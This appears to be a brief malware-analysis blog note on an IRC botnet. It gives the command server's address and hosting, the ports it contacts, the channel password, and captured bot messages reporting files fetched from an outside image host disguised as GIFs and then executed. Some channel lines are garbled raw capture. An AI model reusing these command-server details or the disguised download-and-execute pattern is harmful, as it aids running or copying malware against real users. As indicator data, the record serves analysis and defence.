60.190.223.42(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host Port Number
199.15.234.7 80
70.38.98.236 80
70.38.98.237 80
60.190.223.42 5101 PASS hax0r

PRIVMSG #US! :[d=”http://img102.herosh.com/2012/01/14/551459105.gif” s=”65536 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0
PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/14/594572320.gif” s=”61440 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0
PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/04/210592960.gif” s=”27648 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data3.tmp” – Download retries: 0

PASS hax0r
KCIK n{US|XPa}utqszd
#ngme ng00
#new
#+,#p- #U

hosting infos:
http://whois.domaintools.com/60.190.223.42

Categories: Uncategorized